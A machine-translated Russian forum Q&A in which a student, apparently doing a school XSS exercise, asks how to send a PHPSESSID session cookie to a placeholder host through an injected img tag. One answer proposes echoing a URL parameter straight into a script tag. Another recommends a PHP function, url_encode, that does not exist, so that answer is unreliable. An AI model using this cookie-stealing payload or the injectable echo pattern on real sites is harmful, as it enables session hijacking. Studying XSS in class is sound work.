Передайте $ .variable в URL

0

Я хотел бы передать переменную как ценность для веб-сайта. (Выполнение школьного задания на XSS)

Например, у меня в настоящее время есть: $.cookie('echat') и $.cookie('PHPSESSID')

Я хотел бы передать его в ссылку: xxxx.com/xxx.php?cookie=$.cookie('PHPSESSID ')

Однако ничего не происходит в xxxx.com/xxx.php

Any1 знаю синтаксис для этого?

в частности, я размещаю тег img, как это, чтобы использовать:

& lt img src= ' http://xxxxx.com/xxxxx.php?cookie= ' +document.cookie & gt;

По-видимому, document.cookie не работает, и мне нужно $.cookie('PHPSESSID'), чтобы получить PHPID

  • 0
    Вы используете . в имени вашей переменной?
  • 0
    @iamsleepy Это похоже на код jQuery.
Показать ещё 1 комментарий
Теги:
cookies
xss

2 ответа

0

Ваш URL-адрес устанавливает значение $_GET['cookie'] в $.cookie('PHPSESSID') в вашем скрипте PHP, не более того. Как это обрабатывается до PHP.

Поскольку это похоже на JavaScript (в частности, плагин jQuery Cookie), вы могли бы, возможно, сделать echo "<script>{$_GET['cookie']}</script>"; в вашем PHP, чтобы выплюнуть его как JS на результирующей странице. Как вы, надеюсь, знаете из своих классов, слепо использовать данные, представленные пользователем, это опасно и плохая идея.

  • 0
    я не мог сделать это, потому что эксплойт должен быть сделан в URL. и скрипт-тег santize
0

используйте эту функцию php

url_encode("string")

такие как

http://www.xxxxx.com/xxx.php?cookie=<?php echo url_encode("$.cookie('PHPSESSID')"); ?>

Ещё вопросы

Сообщество Overcoder
Наверх
Меню